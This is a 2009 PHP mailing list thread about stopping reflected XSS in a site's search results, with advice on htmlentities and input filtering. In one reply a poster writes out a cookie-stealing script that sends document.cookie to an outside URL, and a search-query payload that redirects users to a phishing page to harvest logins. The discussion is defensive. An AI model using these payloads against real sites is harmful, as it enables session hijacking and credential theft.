On Wed, 2009-06-10 at 19:23 +0200, Nitsan Bin-Nun wrote: > You can write your a cookiestealer in a few moments using XSS: > <script> > document.location="http://php.net/cookiestealer.php?cookie="+document.cookie; > </script> > > It's not that hard ;) > > If I would see such a XSS vulnerability I would add something like: > youwebsite.com/index.php?searchquery=<script>window.location="http://myphishingpage.com";;</script> > > (of course that everything will be URL encoded, etc) > > Then your users will be redirected through YOUR domain name, to my > webpage, which will contain an exact copy of your page and will > require users to re-login to the system ;) > (and log their login information) > > > There are tons of options, I have investigated one of them, just make > sure your input is what it should be and you will be good (also make > sure you don't execute in any way your input, neither at > exec()/system()/eval() nor at a database query). > > (by the way, do you aware of XSRF/CSRF??) > > HTH, > Nitsan > > On Wed, Jun 10, 2009 at 7:09 PM, Ashley Sheridan > <ash@xxxxxxxxxxxxxxxxxxxx> wrote: > > > > On Wed, 2009-06-10 at 12:55 -0400, Eddie Drapkin wrote: > > > The problem with using a database escaping string for output escaping > > > is that something like (despite being the world's lamest XSS) > > > <script> > > > location.href('google.com') > > > </script> > > > Would output mostly the same and with some cleverness, it wouldn't be > > > too hard to get that to function properly with a full fledged XSS > > > attack. I'd personally use one of the FILTER_* constants in > > > conjunction with the filter functions themselves, say filter_var and > > > FILTER_SANITIZE_SPECIAL_CHARS. > > > > > > > > > On Wed, Jun 10, 2009 at 12:44 PM, Ashley Sheridan > > > <ash@xxxxxxxxxxxxxxxxxxxx> wrote: > > > On Wed, 2009-06-10 at 18:28 +0200, Nitsan Bin-Nun wrote: > > > > mysql_real_escape_string() only sanitise the input. I would > > > personally > > > > only allow [a-zA-Z0-9-_] in search string but that's just > > > me ;) > > > > Validate the input in some way, or make extra sanitisation > > > of it > > > > before running the search query. > > > > > > > > Regarding the HTML output, just entities() it and you'll be > > > good :) > > > > > > > > On Wed, Jun 10, 2009 at 6:32 PM, Ashley Sheridan > > > > <ash@xxxxxxxxxxxxxxxxxxxx> wrote: > > > > > > > > On Wed, 2009-06-10 at 18:18 +0200, Nitsan Bin-Nun > > > wrote: > > > > > As far for the output, just html entities () it > > > and you will > > > > be good. > > > > > > > > > > You better check the search query for sql > > > injection, which > > > > is more > > > > > dangerous. > > > > > > > > > > HTH > > > > > Nitsan > > > > > > > > > > > > > On Wed, Jun 10, 2009 at 6:19 PM, Ashley Sheridan > > > > > <ash@xxxxxxxxxxxxxxxxxxxx> wrote: > > > > > Hi all, > > > > > > > > > > I'm looking at adding a new search feature > > > to my > > > > site, and one > > > > > of the > > > > > elements of this is to echo back in the > > > search > > > > results page, > > > > > the > > > > > original string the user searched for. Up > > > until now, > > > > XSS > > > > > hasn't (afaik) > > > > > been an issue for my site, but I can see > > > from a mile > > > > off this > > > > > will be. > > > > > What would you guys recommend to avoid > > > this? > > > > > > > > > > I'd thought initially of using a mixture > > > of > > > > > html_special_chars() and a > > > > > regex (as yet not sure what I'll be > > > stripping out > > > > with this) > > > > > to sanitise > > > > > the output for display on the results > > > page, but is > > > > this > > > > > enough? > > > > > > > > > > Thanks > > > > > Ash > > > > > www.ashleysheridan.co.uk > > > > > > > > > > > > > > > > > > > > > I always use mysql_real_escape_string() for that > > > sort of > > > > thing, not had > > > > a problem with it, but is there anything you think I > > > should be > > > > wary of? > > > > > > > > > > > > Thanks > > > > Ash > > > > www.ashleysheridan.co.uk > > > > > > > > > > > > > > > > > > > > > > [just bringing it back on list] > > > > > > Well, I don't understand, what is the problem with > > > mysql_real_escape_string() for sanitising input to use for a > > > search? It > > > should escape anything out so that the query can't be used in > > > ways that > > > I don't want no? > > > > > > I'd thought about using a whitelist-only regex, but that seems > > > a little > > > limiting tbh, and as my site contains code, it's not > > > unreasonable to > > > expect some people might want to search for particular code > > > excerpts. > > > > > > > > > > > > Thanks > > > Ash > > > www.ashleysheridan.co.uk > > > > > > > > > > > > -- > > > PHP General Mailing List (http://www.php.net/) > > > To unsubscribe, visit: http://www.php.net/unsub.php > > > > > > > > Oh no, I think I'm misunderstood here. I was going to use > > mysql_real_escape_string only for the database input, and use > > htmlentities for the display output, as essentially they are separate, > > and should be treated as such. > > > > I've been doing a bit of reading, and I can't really understand why XSS > > is such an issue. Sure, if a user can insert a <script> tag, what > > difference will that make to anyone else, as it is only on their own > > browser. > > > > Thanks > > Ash > > www.ashleysheridan.co.uk > > That would only work if you gave out the link to people who expected to see my site. It wouldn't be permanently on my site unless I had a serious hole with saving content to the database my site is driven from. Thanks Ash www.ashleysheridan.co.uk -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
